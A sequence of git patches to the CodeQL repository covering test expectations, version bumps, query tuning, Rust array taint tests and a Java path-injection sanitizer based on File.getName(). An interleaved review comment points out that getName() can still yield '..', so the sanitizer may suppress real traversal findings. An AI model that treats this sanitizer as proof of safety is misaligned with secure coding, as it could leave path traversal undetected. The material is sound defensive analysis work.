--- a/csharp/extractor/Semmle.Extraction.CSharp.Standalone/Program.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.Standalone/Program.cs @@ -1,8 +1,3 @@ -using System; -using System.Collections.Generic; -using Semmle.Util.Logging; -using Semmle.Extraction.CSharp.DependencyFetching; - namespace Semmle.Extraction.CSharp.Standalone { public class Program From 4f00e229e0296e97560923442508a9ae30ad904f Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 4 Dec 2024 13:49:07 +0000 Subject: [PATCH 0805/1267] C++: Accept more test changes. --- .../dataflow/external-models/flow.expected | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/cpp/ql/test/library-tests/dataflow/external-models/flow.expected b/cpp/ql/test/library-tests/dataflow/external-models/flow.expected index a8a3e5a209a..81a9c605f00 100644 --- a/cpp/ql/test/library-tests/dataflow/external-models/flow.expected +++ b/cpp/ql/test/library-tests/dataflow/external-models/flow.expected 
@@ -11,14 +11,14 @@ edges | asio_streams.cpp:100:44:100:62 | call to buffer | asio_streams.cpp:103:29:103:39 | *send_buffer | provenance | Sink:MaD:6 | | asio_streams.cpp:100:64:100:71 | *send_str | asio_streams.cpp:56:18:56:23 | [summary param] *0 in buffer | provenance | | | asio_streams.cpp:100:64:100:71 | *send_str | asio_streams.cpp:100:44:100:62 | call to buffer | provenance | MaD:10 | -| test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | test.cpp:4:5:4:11 | [summary] to write: ReturnValue in ymlStep | provenance | MaD:810 | -| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:7:10:7:18 | call to ymlSource | provenance | Src:MaD:808 | -| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:11:10:11:10 | x | provenance | Sink:MaD:809 | +| test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | test.cpp:4:5:4:11 | [summary] to write: ReturnValue in ymlStep | provenance | MaD:800 | +| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:7:10:7:18 | call to ymlSource | provenance | Src:MaD:798 | +| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:11:10:11:10 | x | provenance | Sink:MaD:799 | | test.cpp:7:10:7:18 | call to ymlSource | test.cpp:13:18:13:18 | x | provenance | | | test.cpp:13:10:13:16 | call to ymlStep | test.cpp:13:10:13:16 | call to ymlStep | provenance | | -| test.cpp:13:10:13:16 | call to ymlStep | test.cpp:15:10:15:10 | y | provenance | Sink:MaD:809 | +| test.cpp:13:10:13:16 | call to ymlStep | test.cpp:15:10:15:10 | y | provenance | Sink:MaD:799 | | test.cpp:13:18:13:18 | x | test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | provenance | | -| test.cpp:13:18:13:18 | x | test.cpp:13:10:13:16 | call to ymlStep | provenance | MaD:810 | +| test.cpp:13:18:13:18 | x | test.cpp:13:10:13:16 | call to ymlStep | provenance | MaD:800 | nodes | asio_streams.cpp:56:18:56:23 | [summary param] *0 in buffer | semmle.label | [summary param] *0 in buffer | | asio_streams.cpp:56:18:56:23 | [summary] to write: ReturnValue in buffer | semmle.label | [summary] to write: 
ReturnValue in buffer | From 147d6991333e702528e8c386e8ee7aac5c0897e9 Mon Sep 17 00:00:00 2001 From: Calum Grant Date: Wed, 4 Dec 2024 15:45:17 +0000 Subject: [PATCH 0806/1267] C++: Add another test case --- .../WrongNumberOfFormatArguments.expected | 1 + .../Format/WrongNumberOfFormatArguments/syntax_errors.c | 7 +++++++ 2 files changed, 8 insertions(+) diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/WrongNumberOfFormatArguments.expected b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/WrongNumberOfFormatArguments.expected index d99190ef1eb..0c0ae6000cd 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/WrongNumberOfFormatArguments.expected +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/WrongNumberOfFormatArguments.expected @@ -5,6 +5,7 @@ | macros.cpp:14:2:14:37 | call to printf | Format for printf (in a macro expansion) expects 4 arguments but given 3 | | macros.cpp:21:2:21:36 | call to printf | Format for printf (in a macro expansion) expects 4 arguments but given 3 | | macros.cpp:32:2:32:25 | call to printf | Format for printf (in a macro expansion) expects 1 arguments but given 0 | +| syntax_errors.c:15:5:15:10 | call to printf | Format for printf expects 2 arguments but given 0 | | test.c:9:2:9:7 | call to printf | Format for printf expects 1 arguments but given 0 | | test.c:12:2:12:7 | call to printf | Format for printf expects 2 arguments but given 1 | | test.c:15:2:15:7 | call to printf | Format for printf expects 3 arguments but given 2 | diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/syntax_errors.c b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/syntax_errors.c index c9f7ab4dc4b..d10d1025b8f 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/syntax_errors.c 
+++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/syntax_errors.c @@ -3,9 +3,16 @@ extern int printf(const char *fmt, ...); void test_syntax_error() { + // GOOD printf("Error code %d: " UNDEFINED_MACRO, 0, ""); + // GOOD printf("%d%d", (UNDEFINED_MACRO)1, (UNDEFINED_MACRO)2); + + // GOOD [FALSE POSITIVE] + printf("%d%d" + UNDEFINED_MACRO, + 1, 2); } From cf71a1525b2549b92b331ba3a04a55705317038a Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" Date: Wed, 4 Dec 2024 18:36:17 +0000 Subject: [PATCH 0807/1267] Post-release preparation for codeql-cli-2.20.0 --- cpp/ql/lib/qlpack.yml | 2 +- cpp/ql/src/qlpack.yml | 2 +- csharp/ql/campaigns/Solorigate/lib/qlpack.yml | 2 +- csharp/ql/campaigns/Solorigate/src/qlpack.yml | 2 +- csharp/ql/lib/qlpack.yml | 2 +- csharp/ql/src/qlpack.yml | 2 +- go/ql/consistency-queries/qlpack.yml | 2 +- go/ql/lib/qlpack.yml | 2 +- go/ql/src/qlpack.yml | 2 +- java/ql/lib/qlpack.yml | 2 +- java/ql/src/qlpack.yml | 2 +- javascript/ql/lib/qlpack.yml | 2 +- javascript/ql/src/qlpack.yml | 2 +- misc/suite-helpers/qlpack.yml | 2 +- python/ql/lib/qlpack.yml | 2 +- python/ql/src/qlpack.yml | 2 +- ruby/ql/lib/qlpack.yml | 2 +- ruby/ql/src/qlpack.yml | 2 +- shared/controlflow/qlpack.yml | 2 +- shared/dataflow/qlpack.yml | 2 +- shared/mad/qlpack.yml | 2 +- shared/rangeanalysis/qlpack.yml | 2 +- shared/regex/qlpack.yml | 2 +- shared/ssa/qlpack.yml | 2 +- shared/threat-models/qlpack.yml | 2 +- shared/tutorial/qlpack.yml | 2 +- shared/typeflow/qlpack.yml | 2 +- shared/typetracking/qlpack.yml | 2 +- shared/typos/qlpack.yml | 2 +- shared/util/qlpack.yml | 2 +- shared/xml/qlpack.yml | 2 +- shared/yaml/qlpack.yml | 2 +- swift/ql/lib/qlpack.yml | 2 +- swift/ql/src/qlpack.yml | 2 +- 34 files changed, 34 insertions(+), 34 deletions(-) diff --git a/cpp/ql/lib/qlpack.yml b/cpp/ql/lib/qlpack.yml index 723a2c3544e..4bb4b04e02f 100644 --- a/cpp/ql/lib/qlpack.yml +++ b/cpp/ql/lib/qlpack.yml 
@@ -1,5 +1,5 @@
 name: codeql/cpp-all
-version: 3.0.0
+version: 3.0.1-dev
 groups: cpp
 dbscheme: semmlecode.cpp.dbscheme
 extractor: cpp
diff --git a/cpp/ql/src/qlpack.yml b/cpp/ql/src/qlpack.yml
index 824ee1459aa..940c3e2a4cb 100644
--- a/cpp/ql/src/qlpack.yml
+++ b/cpp/ql/src/qlpack.yml
@@ -1,5 +1,5 @@
 name: codeql/cpp-queries
-version: 1.3.0
+version: 1.3.1-dev
 groups:
 - cpp
 - queries
diff --git a/csharp/ql/campaigns/Solorigate/lib/qlpack.yml b/csharp/ql/campaigns/Solorigate/lib/qlpack.yml
index daac6be2fbb..781915bf1a1 100644
--- a/csharp/ql/campaigns/Solorigate/lib/qlpack.yml
+++ b/csharp/ql/campaigns/Solorigate/lib/qlpack.yml
@@ -1,5 +1,5 @@
 name: codeql/csharp-solorigate-all
-version: 1.7.30
+version: 1.7.31-dev
 groups:
 - csharp
 - solorigate
diff --git a/csharp/ql/campaigns/Solorigate/src/qlpack.yml b/csharp/ql/campaigns/Solorigate/src/qlpack.yml
index 1b3b911c6f1..979d8e6c661 100644
--- a/csharp/ql/campaigns/Solorigate/src/qlpack.yml
+++ b/csharp/ql/campaigns/Solorigate/src/qlpack.yml
@@ -1,5 +1,5 @@
 name: codeql/csharp-solorigate-queries
-version: 1.7.30
+version: 1.7.31-dev
 groups:
 - csharp
 - solorigate
diff --git a/csharp/ql/lib/qlpack.yml b/csharp/ql/lib/qlpack.yml
index d985d58b112..81a55470a4d 100644
--- a/csharp/ql/lib/qlpack.yml
+++ b/csharp/ql/lib/qlpack.yml
@@ -1,5 +1,5 @@
 name: codeql/csharp-all
-version: 4.0.0
+version: 4.0.1-dev
 groups: csharp
 dbscheme: semmlecode.csharp.dbscheme
 extractor: csharp
diff --git a/csharp/ql/src/qlpack.yml b/csharp/ql/src/qlpack.yml
index f838d279d87..e4d9400d96d 100644
--- a/csharp/ql/src/qlpack.yml
+++ b/csharp/ql/src/qlpack.yml
@@ -1,5 +1,5 @@
 name: codeql/csharp-queries
-version: 1.0.13
+version: 1.0.14-dev
 groups:
 - csharp
 - queries
diff --git a/go/ql/consistency-queries/qlpack.yml b/go/ql/consistency-queries/qlpack.yml
index 72aeab276d7..1812705438c 100644
--- a/go/ql/consistency-queries/qlpack.yml
+++ b/go/ql/consistency-queries/qlpack.yml
@@ -1,5 +1,5 @@ name: codeql-go-consistency-queries -version: 1.0.13 +version: 1.0.14-dev groups: - go - queries diff --git a/go/ql/lib/qlpack.yml b/go/ql/lib/qlpack.yml index df0d0e9d5fc..4e72aa3857b 100644 --- a/go/ql/lib/qlpack.yml +++ b/go/ql/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/go-all -version: 3.0.0 +version: 3.0.1-dev groups: go dbscheme: go.dbscheme extractor: go diff --git a/go/ql/src/qlpack.yml b/go/ql/src/qlpack.yml index ecd9cbb13f0..36775d0d862 100644 --- a/go/ql/src/qlpack.yml +++ b/go/ql/src/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/go-queries -version: 1.1.4 +version: 1.1.5-dev groups: - go - queries diff --git a/java/ql/lib/qlpack.yml b/java/ql/lib/qlpack.yml index 54f56a24606..f892ca1c450 100644 --- a/java/ql/lib/qlpack.yml +++ b/java/ql/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/java-all -version: 5.0.0 +version: 5.0.1-dev groups: java dbscheme: config/semmlecode.dbscheme extractor: java diff --git a/java/ql/src/qlpack.yml b/java/ql/src/qlpack.yml index eb757401a84..8ee211fb536 100644 --- a/java/ql/src/qlpack.yml +++ b/java/ql/src/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/java-queries -version: 1.1.10 +version: 1.1.11-dev groups: - java - queries diff --git a/javascript/ql/lib/qlpack.yml b/javascript/ql/lib/qlpack.yml index 4245aa6e5d3..4d568ff4813 100644 --- a/javascript/ql/lib/qlpack.yml +++ b/javascript/ql/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/javascript-all -version: 2.2.0 +version: 2.2.1-dev groups: javascript dbscheme: semmlecode.javascript.dbscheme extractor: javascript diff --git a/javascript/ql/src/qlpack.yml b/javascript/ql/src/qlpack.yml index ba7c502b29f..78f0585027b 100644 --- a/javascript/ql/src/qlpack.yml +++ b/javascript/ql/src/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/javascript-queries -version: 1.2.5 +version: 1.2.6-dev groups: - javascript - queries diff --git a/misc/suite-helpers/qlpack.yml b/misc/suite-helpers/qlpack.yml index 834362022be..eeb8f762b13 100644 --- a/misc/suite-helpers/qlpack.yml 
+++ b/misc/suite-helpers/qlpack.yml @@ -1,4 +1,4 @@ name: codeql/suite-helpers -version: 1.0.13 +version: 1.0.14-dev groups: shared warnOnImplicitThis: true diff --git a/python/ql/lib/qlpack.yml b/python/ql/lib/qlpack.yml index 978dfd96a83..147933b96fe 100644 --- a/python/ql/lib/qlpack.yml +++ b/python/ql/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/python-all -version: 3.0.0 +version: 3.0.1-dev groups: python dbscheme: semmlecode.python.dbscheme extractor: python diff --git a/python/ql/src/qlpack.yml b/python/ql/src/qlpack.yml index bff5afdf817..d83b6433ac6 100644 --- a/python/ql/src/qlpack.yml +++ b/python/ql/src/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/python-queries -version: 1.3.4 +version: 1.3.5-dev groups: - python - queries diff --git a/ruby/ql/lib/qlpack.yml b/ruby/ql/lib/qlpack.yml index 41b72629a67..ddf106c95bf 100644 --- a/ruby/ql/lib/qlpack.yml +++ b/ruby/ql/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/ruby-all -version: 3.0.0 +version: 3.0.1-dev groups: ruby extractor: ruby dbscheme: ruby.dbscheme diff --git a/ruby/ql/src/qlpack.yml b/ruby/ql/src/qlpack.yml index 7f337d89d6a..43bfe75f566 100644 --- a/ruby/ql/src/qlpack.yml +++ b/ruby/ql/src/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/ruby-queries -version: 1.1.8 +version: 1.1.9-dev groups: - ruby - queries diff --git a/shared/controlflow/qlpack.yml b/shared/controlflow/qlpack.yml index 5401179ac96..268f142bd1b 100644 --- a/shared/controlflow/qlpack.yml +++ b/shared/controlflow/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/controlflow -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true dependencies: diff --git a/shared/dataflow/qlpack.yml b/shared/dataflow/qlpack.yml index 55eb216cc54..6a8e8c3a4ae 100644 --- a/shared/dataflow/qlpack.yml +++ b/shared/dataflow/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/dataflow -version: 1.1.7 +version: 1.1.8-dev groups: shared library: true dependencies: diff --git a/shared/mad/qlpack.yml b/shared/mad/qlpack.yml index 5c37e609029..125bcad622d 100644 
--- a/shared/mad/qlpack.yml +++ b/shared/mad/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/mad -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true dependencies: diff --git a/shared/rangeanalysis/qlpack.yml b/shared/rangeanalysis/qlpack.yml index bd33c35fe53..62c8c1e46b6 100644 --- a/shared/rangeanalysis/qlpack.yml +++ b/shared/rangeanalysis/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/rangeanalysis -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true dependencies: diff --git a/shared/regex/qlpack.yml b/shared/regex/qlpack.yml index 07d9f87eb8c..e2cda264dc8 100644 --- a/shared/regex/qlpack.yml +++ b/shared/regex/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/regex -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true dependencies: diff --git a/shared/ssa/qlpack.yml b/shared/ssa/qlpack.yml index 9a2027d0706..b146ce5bc91 100644 --- a/shared/ssa/qlpack.yml +++ b/shared/ssa/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/ssa -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true dependencies: diff --git a/shared/threat-models/qlpack.yml b/shared/threat-models/qlpack.yml index d29bd36dd83..6ec41bbcc04 100644 --- a/shared/threat-models/qlpack.yml +++ b/shared/threat-models/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/threat-models -version: 1.0.13 +version: 1.0.14-dev library: true groups: shared dataExtensions: diff --git a/shared/tutorial/qlpack.yml b/shared/tutorial/qlpack.yml index e618abb068b..6677c74eed4 100644 --- a/shared/tutorial/qlpack.yml +++ b/shared/tutorial/qlpack.yml @@ -1,7 +1,7 @@ name: codeql/tutorial description: Library for the CodeQL detective tutorials, helping new users learn to write CodeQL queries. -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true warnOnImplicitThis: true diff --git a/shared/typeflow/qlpack.yml b/shared/typeflow/qlpack.yml index e9d46c074e8..cd9e70bba8c 100644 --- a/shared/typeflow/qlpack.yml +++ b/shared/typeflow/qlpack.yml 
@@ -1,5 +1,5 @@ name: codeql/typeflow -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true dependencies: diff --git a/shared/typetracking/qlpack.yml b/shared/typetracking/qlpack.yml index 9e4717670a7..fbe63f0da01 100644 --- a/shared/typetracking/qlpack.yml +++ b/shared/typetracking/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/typetracking -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true dependencies: diff --git a/shared/typos/qlpack.yml b/shared/typos/qlpack.yml index b3ed91c0926..250f729ab5f 100644 --- a/shared/typos/qlpack.yml +++ b/shared/typos/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/typos -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true warnOnImplicitThis: true diff --git a/shared/util/qlpack.yml b/shared/util/qlpack.yml index 4b66bd8ad92..b327c25a3d9 100644 --- a/shared/util/qlpack.yml +++ b/shared/util/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/util -version: 2.0.0 +version: 2.0.1-dev groups: shared library: true dependencies: null diff --git a/shared/xml/qlpack.yml b/shared/xml/qlpack.yml index 8d8b1b8ee54..76c408c2920 100644 --- a/shared/xml/qlpack.yml +++ b/shared/xml/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/xml -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true dependencies: diff --git a/shared/yaml/qlpack.yml b/shared/yaml/qlpack.yml index 998a94f4bbf..0c756e1edbb 100644 --- a/shared/yaml/qlpack.yml +++ b/shared/yaml/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/yaml -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true warnOnImplicitThis: true diff --git a/swift/ql/lib/qlpack.yml b/swift/ql/lib/qlpack.yml index 66fd8af358e..7752975faea 100644 --- a/swift/ql/lib/qlpack.yml +++ b/swift/ql/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/swift-all -version: 3.0.0 +version: 3.0.1-dev groups: swift extractor: swift dbscheme: swift.dbscheme diff --git a/swift/ql/src/qlpack.yml b/swift/ql/src/qlpack.yml index ee53e55fe41..ec8e2cb9932 100644 --- a/swift/ql/src/qlpack.yml +++ b/swift/ql/src/qlpack.yml 
@@ -1,5 +1,5 @@ name: codeql/swift-queries -version: 1.0.13 +version: 1.0.14-dev groups: - swift - queries From 1ac6c3751bea31c12d6c6be156d04ec2c1f144c0 Mon Sep 17 00:00:00 2001 From: Andrew Eisenberg Date: Wed, 4 Dec 2024 11:41:40 -0800 Subject: [PATCH 0808/1267] Update action.yml to use artifacts@v4 v3 is getting deprecated. --- go/actions/test/action.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/go/actions/test/action.yml b/go/actions/test/action.yml index 5228f440971..0a4f13fa0ef 100644 --- a/go/actions/test/action.yml +++ b/go/actions/test/action.yml @@ -59,7 +59,7 @@ runs: - name: Upload qhelp markdown if: inputs.run-code-checks == 'true' && !cancelled() - uses: actions/upload-artifact@v3 + uses: actions/upload-artifact@v4 with: name: qhelp-markdown path: go/qhelp-out/**/*.md From 6fd9e19673e97dd3bf6da3d17a80f72ed20cd634 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 4 Dec 2024 20:10:45 +0000 Subject: [PATCH 0809/1267] C++: Fix a join-order problem that happens on #18207. --- cpp/ql/src/Best Practices/GuardedFree.ql | 22 +++++++++++++++++++--- 1 file changed, 19 insertions(+), 3 deletions(-) diff --git a/cpp/ql/src/Best Practices/GuardedFree.ql b/cpp/ql/src/Best Practices/GuardedFree.ql index ea81a715828..3afe1a92e95 100644 --- a/cpp/ql/src/Best Practices/GuardedFree.ql +++ b/cpp/ql/src/Best Practices/GuardedFree.ql @@ -27,8 +27,12 @@ predicate blockContainsPreprocessorBranches(BasicBlock bb) { ) } -from GuardCondition gc, FreeCall fc, Variable v, BasicBlock bb -where +/** + * Holds if `gc` ensures that `v` is non-zero when reaching `bb`, and `bb` + * contains a single statement which is `fc`. + */ +pragma[nomagic] +private predicate interesting(GuardCondition gc, FreeCall fc, Variable v, BasicBlock bb) { gc.ensuresEq(v.getAnAccess(), 0, bb, false) and fc.getArgument(0) = v.getAnAccess() and bb = fc.getBasicBlock() and 
@@ -39,9 +43,21 @@ where // Block statement with a single nested statement: if (x) { free(x); } strictcount(bb.(BlockStmt).getAStmt()) = 1 ) and - strictcount(BasicBlock bb2 | gc.ensuresEq(_, 0, bb2, _) | bb2) = 1 and not fc.isInMacroExpansion() and not blockContainsPreprocessorBranches(bb) and not (gc instanceof BinaryOperation and not gc instanceof ComparisonOperation) and not exists(CommaExpr c | c.getAChild*() = fc) +} + +/** Holds if `gc` only guards a single block. */ +bindingset[gc] +pragma[inline_late] +private predicate guardConditionGuardsUniqueBlock(GuardCondition gc) { + strictcount(BasicBlock bb | gc.ensuresEq(_, 0, bb, _)) = 1 +} + +from GuardCondition gc, FreeCall fc, Variable v, BasicBlock bb +where + interesting(gc, fc, v, bb) and + guardConditionGuardsUniqueBlock(gc) select gc, "unnecessary NULL check before call to $@", fc, "free" From 121780c55a5fb5f2da85ea4cccdfdd50f34b5284 Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Wed, 4 Dec 2024 16:56:49 -0500 Subject: [PATCH 0810/1267] Java: add File.getName as a path injection sanitizer --- .../semmle/code/java/security/PathSanitizer.qll | 15 +++++++++++++++ .../CWE-022/semmle/tests/TaintedPath.java | 15 +++++++++++++++ 2 files changed, 30 insertions(+) diff --git a/java/ql/lib/semmle/code/java/security/PathSanitizer.qll b/java/ql/lib/semmle/code/java/security/PathSanitizer.qll index 77803e3e27d..0d2e5cdfa7f 100644 --- a/java/ql/lib/semmle/code/java/security/PathSanitizer.qll +++ b/java/ql/lib/semmle/code/java/security/PathSanitizer.qll 
@@ -333,3 +333,18 @@ private Method getSourceMethod(Method m) { not exists(Method src | m = src.getKotlinParameterDefaultsProxy()) and result = m } + +/** + * A sanitizer that protects against path injection vulnerabilities + * by extracting the final component of the user provided path. + * + * TODO: convert this class to models-as-data if sanitizer support is added + */ +private class FileGetNameSanitizer extends PathInjectionSanitizer { + FileGetNameSanitizer() { + exists(MethodCall mc | + mc.getMethod().hasQualifiedName("java.io", "File", "getName") and + this.asExpr() = mc + ) + } +} diff --git a/java/ql/test/query-tests/security/CWE-022/semmle/tests/TaintedPath.java b/java/ql/test/query-tests/security/CWE-022/semmle/tests/TaintedPath.java index 8bfc35c1d96..00447364bb3 100644 --- a/java/ql/test/query-tests/security/CWE-022/semmle/tests/TaintedPath.java +++ b/java/ql/test/query-tests/security/CWE-022/semmle/tests/TaintedPath.java @@ -71,4 +71,19 @@ public class TaintedPath { fileLine = fileReader.readLine(); } } + + public void sendUserFileGood4(Socket sock, String user) throws IOException { + BufferedReader filenameReader = + new BufferedReader(new InputStreamReader(sock.getInputStream(), "UTF-8")); + String filename = filenameReader.readLine(); + File file = new File(filename); + String baseName = file.getName(); + // GOOD: only use the final component of the user provided path + BufferedReader fileReader = new BufferedReader(new FileReader(baseName)); + String fileLine = fileReader.readLine(); + while (fileLine != null) { + sock.getOutputStream().write(fileLine.getBytes()); + fileLine = fileReader.readLine(); + } + } } From d25045c936739e41f51792c1879e644f5321a9d4 Mon Sep 17 00:00:00 2001 
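Review bot: `FileGetNameSanitizer` in PathSanitizer.qll treats every `java.io.File.getName()` result as fully sanitized, but `getName()` only drops everything up to the last separator, so an input whose final component is `..` still yields `..`. Where the base name is later joined onto a directory, the sanitizer may therefore suppress a result that still escapes one level. I would record that limit in the QLDoc, e.g. `* Note: getName() can still return "..", so this does not by itself guarantee containment in a base directory.` The added `sendUserFileGood4` test covers only the benign case, so a companion test with a base-directory join would show what the query reports there.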
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Thu, 5 Dec 2024 03:26:59 +0000 Subject: [PATCH 0811/1267] Bump golang.org/x/tools Bumps the extractor-dependencies group in /go/extractor with 1 update: [golang.org/x/tools](https://github.com/golang/tools). Updates `golang.org/x/tools` from 0.27.0 to 0.28.0 - [Release notes](https://github.com/golang/tools/releases) - [Commits](https://github.com/golang/tools/compare/v0.27.0...v0.28.0) --- updated-dependencies: - dependency-name: golang.org/x/tools dependency-type: direct:production update-type: version-update:semver-minor dependency-group: extractor-dependencies ... Signed-off-by: dependabot[bot] --- go/extractor/go.mod | 4 ++-- go/extractor/go.sum | 10 ++++++---- 2 files changed, 8 insertions(+), 6 deletions(-) diff --git a/go/extractor/go.mod b/go/extractor/go.mod index c5e1ecf09ff..af822b77eb9 100644 --- a/go/extractor/go.mod +++ b/go/extractor/go.mod @@ -10,7 +10,7 @@ toolchain go1.23.1 // bazel mod tidy require ( golang.org/x/mod v0.22.0 - golang.org/x/tools v0.27.0 + golang.org/x/tools v0.28.0 ) -require golang.org/x/sync v0.9.0 // indirect +require golang.org/x/sync v0.10.0 // indirect diff --git a/go/extractor/go.sum b/go/extractor/go.sum index a10e428fcbc..e3144c2c5f5 100644 --- a/go/extractor/go.sum +++ b/go/extractor/go.sum 
@@ -1,6 +1,8 @@ +github.com/google/go-cmp v0.6.0 h1:ofyhxvXcZhMsU5ulbFiLKl/XBFqE1GSq7atu8tAmTRI= +github.com/google/go-cmp v0.6.0/go.mod h1:17dUlkBOakJ0+DkrSSNjCkIjxS6bF9zb3elmeNGIjoY= golang.org/x/mod v0.22.0 h1:D4nJWe9zXqHOmWqj4VMOJhvzj7bEZg4wEYa759z1pH4= golang.org/x/mod v0.22.0/go.mod h1:6SkKJ3Xj0I0BrPOZoBy3bdMptDDU9oJrpohJ3eWZ1fY= -golang.org/x/sync v0.9.0 h1:fEo0HyrW1GIgZdpbhCRO0PkJajUS5H9IFUztCgEo2jQ= -golang.org/x/sync v0.9.0/go.mod h1:Czt+wKu1gCyEFDUtn0jG5QVvpJ6rzVqr5aXyt9drQfk= -golang.org/x/tools v0.27.0 h1:qEKojBykQkQ4EynWy4S8Weg69NumxKdn40Fce3uc/8o= -golang.org/x/tools v0.27.0/go.mod h1:sUi0ZgbwW9ZPAq26Ekut+weQPR5eIM6GQLQ1Yjm1H0Q= +golang.org/x/sync v0.10.0 h1:3NQrjDixjgGwUOCaF8w2+VYHv0Ve/vGYSbdkTa98gmQ= +golang.org/x/sync v0.10.0/go.mod h1:Czt+wKu1gCyEFDUtn0jG5QVvpJ6rzVqr5aXyt9drQfk= +golang.org/x/tools v0.28.0 h1:WuB6qZ4RPCQo5aP3WdKZS7i595EdWqWR8vqJTlwTVK8= +golang.org/x/tools v0.28.0/go.mod h1:dcIOrVd3mfQKTgrDVQHqCPMWy6lnhfhtX3hLXYVLfRw= From 44239cbf2e77945ed4ef4901cef928f8d5c390cb Mon Sep 17 00:00:00 2001 From: Simon Friis Vindum Date: Thu, 5 Dec 2024 11:39:05 +0100 Subject: [PATCH 0812/1267] Rust: Add taint tests for arrays --- .../test/library-tests/dataflow/taint/main.rs | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) diff --git a/rust/ql/test/library-tests/dataflow/taint/main.rs b/rust/ql/test/library-tests/dataflow/taint/main.rs index 0ce5ba06391..ad29e0094e4 100644 --- a/rust/ql/test/library-tests/dataflow/taint/main.rs +++ b/rust/ql/test/library-tests/dataflow/taint/main.rs 
@@ -40,6 +40,37 @@ mod string { } } +mod array_source { + fn source(i: i64) -> [i64; 3] { + [i; 3] + } + + fn sink(i: i64) { + println!("{}", i); + } + + pub fn array_tainted() { + let arr = source(76); + sink(arr[1]); // $ MISSING: hasTaintFlow=76 + } +} + +mod array_sink { + fn source(i: i64) -> i64 { + i + } + + fn sink(s: [i64; 3]) { + println!("{}", s[1]); + } + + pub fn array_with_taint() { + let mut arr2 = [1, 2, 3]; + arr2[1] = source(36); + sink(arr2); // $ MISSING: hasTaintFlow=36 + } +} + use string::*; fn main() { @@ -47,4 +78,6 @@ fn main() { negation(); cast(); string_slice(); + array_source::array_tainted(); + array_sink::array_with_taint(); } From 1f4e7d1f37b6c7cecc2d06f3312da7055c6ea6ca Mon Sep 17 00:00:00 2001 From: Simon Friis Vindum Date: Thu, 5 Dec 2024 11:41:32 +0100 Subject: [PATCH 0813/1267] Rust: Handle arrays in taint tracking --- .../rust/dataflow/internal/DataFlowImpl.qll | 4 ++-- .../dataflow/internal/TaintTrackingImpl.qll | 17 ++++++++++++++--- .../dataflow/taint/TaintFlowStep.expected | 3 +++ .../dataflow/taint/inline-taint-flow.expected | 10 ++++++++++ .../test/library-tests/dataflow/taint/main.rs | 4 ++-- 5 files changed, 31 insertions(+), 7 deletions(-) diff --git a/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll b/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll index 236cae01c73..95d013814ed 100644 --- a/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll +++ b/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll @@ -626,7 +626,7 @@ private class StructFieldContent extends Content, TStructFieldContent { /** * Content stored at an element in an array. */ -final private class ArrayElementContent extends VariantContent, TArrayElement { +final class ArrayElementContent extends Content, TArrayElement { ArrayElementContent() { this = TArrayElement() } override string toString() { result = "array[]" } 
